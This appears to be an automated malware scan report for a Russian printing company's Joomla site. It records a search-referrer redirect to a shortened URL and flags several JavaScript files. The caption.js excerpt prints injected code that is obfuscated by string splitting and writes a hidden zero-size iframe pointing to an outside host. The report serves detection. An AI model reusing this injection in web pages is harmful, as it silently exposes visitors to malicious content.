Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://dopredela.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: dopredela.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sat, 20 Sep 2014 20:18:25 GMT Location: http://tinyurl.com/c2td3xs Server: nginx Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.2.17 | malicious |
Scanned pages/files
Request | Server response | Status |
http://dopredela.ru/ | 200 OK Content-Length: 25804 Content-Type: text/html | clean |
http://dopredela.ru/media/system/js/caption.js | 200 OK Content-Length: 11919 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = document.write('<iframe src="'+'ht'+'tp://'+'ma'+'l'+'oy'+'ar'+'os'+'lavets-tv.ru/c'+'omp'+'on'+'ents/c'+'om_c'+'ont'+'ent/'+'m'+'od'+'els/'+'sh.'+'html" width="0" height="0" frameborder="0"></iframe>'); Antivirus reports:
| ||
http://dopredela.ru/templates/ja_purity/js/ja.script.js | 200 OK Content-Length: 12959 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var siteurl = ''; function fixIEPNG(el, bgimgdf, sizingMethod, type, offset){ var objs = el; if(!objs) return; if ($type(objs) != 'array') objs = [objs]; if(!sizingMethod) sizingMethod = 'crop'; if(!offset) offset = 0; var blankimg = siteurl + 'images/blank.png'; objs.each(function(obj) { var bgimg = bgimgdf; if (obj.tagName == 'IMG') { if (!bgimg) bgimg = obj.src; if (!(/\.png$/i).test(bgimg) || (/blank\.png$/i).test(bgimg)) re Antivirus reports:
| ||
http://dopredela.ru/templates/ja_purity/js/ja.cssmenu.js | 200 OK Content-Length: 10330 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) sfHover = function() { var sfEls = document.getElementById("ja-mainnav").getElementsByTagName("li"); for (var i=0; i<sfEls.length; ++i) { sfEls[i].onmouseover=function() { clearTimeout(this.timer); if(this.className.indexOf(" sfhover") == -1) this.className+=" sfhover"; } sfEls[i].onmouseout=function() { this.timer = setTimeout(sfHoverOut.bind(this), 20); } } } function sfHoverOut() { clearTimeout(this.timer); Antivirus reports:
| ||
http://dopredela.ru/home | 200 OK Content-Length: 25797 Content-Type: text/html | clean |
http://dopredela.ru/about | 200 OK Content-Length: 19579 Content-Type: text/html | clean |
http://dopredela.ru/portfolio | 200 OK Content-Length: 17982 Content-Type: text/html | clean |
http://dopredela.ru/offset-printing | 200 OK Content-Length: 33327 Content-Type: text/html | clean |
http://dopredela.ru/digital-printing | 200 OK Content-Length: 24345 Content-Type: text/html | clean |
http://dopredela.ru/pricelist | 200 OK Content-Length: 26737 Content-Type: text/html | clean |
http://dopredela.ru/2011-05-19-11-06-22 | 404 Not Found Content-Length: 1844 Content-Type: text/html | clean |
http://dopredela.ru/index.php | 200 OK Content-Length: 25825 Content-Type: text/html | clean |
http://dopredela.ru/index.php?option=com_content&view=frontpage&pharm | 200 OK Content-Length: 301305 Content-Type: text/html | clean |
http://dopredela.ru/test404page.js | 404 Not Found Content-Length: 2317 Content-Type: text/html | clean |
http://dopredela.ru/paperflags | 200 OK Content-Length: 22321 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dopredela.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://dopredela.ru/
Result: dopredela.ru is not infected or malware details are not published yet.
Result: dopredela.ru is not infected or malware details are not published yet.